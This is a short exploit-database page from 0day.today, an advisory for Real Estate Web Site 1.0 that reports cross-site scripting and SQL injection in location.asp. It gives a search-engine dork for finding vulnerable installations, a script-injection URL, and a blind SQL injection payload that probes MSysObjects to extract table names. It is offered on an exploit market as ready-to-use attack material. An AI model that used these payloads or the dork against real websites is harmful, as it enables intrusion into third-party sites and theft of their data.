[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3136
Category
web applications
Date add
08-06-2008
Platform
unsorted
==================================================================
Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities
==================================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: Real Estate Web Site 1.0
[~] HomePage: http://www.real-estate-website.org/
[~] Exploit: Multiple Remote Vulnerabilities [High]

[~] Dork: "powered by real-estate-website"

[+] Cross Site Scripting:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=[XSS]
[~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script>

[+] Remote SQL Injection:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL]
[~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00




#  0day.today [2024-12-24]  #